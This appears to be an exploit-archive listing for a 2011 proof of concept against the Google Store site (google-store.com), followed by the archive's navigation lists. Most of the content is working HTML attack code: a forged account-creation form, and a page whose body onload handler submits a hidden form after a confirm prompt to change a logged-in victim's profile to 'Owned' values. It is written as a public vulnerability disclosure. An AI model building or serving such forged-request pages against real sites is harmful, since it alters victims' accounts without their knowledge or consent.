Google Store Cross Site Request Forgery

Google Store Cross Site Request Forgery: Posted Aug 27, 2011; Authored by C4SS!0 G0M3S; Google Store suffers from multiple cross site request forgery vulnerabilities.; tags | exploit, vulnerability, csrf; SHA-256 | 14d318491a70c74c8018dd2bba90fced5164c7aa0aa44092808c3d06576e3cca; Download | Favorite | View

Google Store Cross Site Request Forgery

#
#[+]Exploiy Title: Google Store Multiple XSRF Security Vulnerabilities
#[+]Date: 26\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Vendor Link: https://www.google-store.com
#

#################################### Add User ####################################################
<body style="background-color: black; color: white;">
<form action="https://www.google-store.com/create_account.php" method="POST">
  <input type="hidden" name="action" value="process"></input>
  <b>First Name:</b><br><input type="text" size="50" name="firstname" value=""></input><br>
  <b>Last Name:</b><br><input type="text" size="50" name="lastname" value=""></input><br>
  <b>E-mail Address:</b><br><input type="text" size="50" name="email_address" value=""></input><br>
  <b>Company:</b><br><input type="text" size="50" name="company" value=""></input><br>
  <b>Address:</b><br><input type="text" size="50" name="street_address" value=""></input><br>
  <b>Post Code:</b><br><input type="text" size="50" name="postcode" value=""></input><br>
  <input type="hidden" name="country" value="30"></input>
  <b>City:</b><br><input type="text" size="50" name="city" value=""></input><br>
  <b>Telephone:</b><br><input type="text" size="50" name="telephone" value=""></input><br>
  <b>Fax:</b><br><input type="text" size="50" name="fax" value=""></input><br>
  <input type="hidden" name="newsletter" value="1"></input>
  <input type="hidden" name="x" value="47"></input>
  <input type="hidden" name="y" value="15"></input>
  
  <input type="submit" value="Send Request"></input>
</form>
#################################################################################################

################################### Profile User Informations Editor ############################
<title>Google Store Profile Informations Editor CSRF Vulnerability.</title>
<body onload="con = confirm('Are You Ready'); if(con){document.send.submit()}" style="background-color:black; color: white;">
<h1>This exploit demonstrates how to exploit a CSRF flaw on the site of the Google Store.<br><br>
Steps to reproduce:<br><br>
1. Log in no <a href="https://www.google-store.com" target="_blank">Google Store</a>.<br>
2. Open this exploit and click in Ok.<br>
3. Check your profile configurations. :)<br><br>
Are You Ready?
</h1>
<form name="send" action="https://www.google-store.com/account_edit.php" method="POST">  
  <input type="hidden" name="action" value="process"></input>
  <input type="hidden" name="firstname" value="Owned"></input>
  <input type="hidden" name="lastname" value="Owned"></input>
  <input type="hidden" name="email_address" value="Owned@gmail.com"></input>
  <input type="hidden" name="telephone" value="123456789"></input>
  <input type="hidden" name="fax" value="9876543210"></input>
  <input type="hidden" name="x" value="99"></input>
  <input type="hidden" name="y" value="99"></input>
</form>
#####################################################################################################

Top Authors In Last 30 Days

Red Hat 297 files
Ubuntu 69 files
Debian 20 files
Gentoo 8 files
Apple 6 files
Google Security Research 4 files
LiquidWorm 4 files
Spencer McIntyre 3 files
Alter Prime 3 files
Jann Horn 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Google Store Cross Site Request Forgery

Google Store Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Google Store Cross Site Request Forgery

Share This

Google Store Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems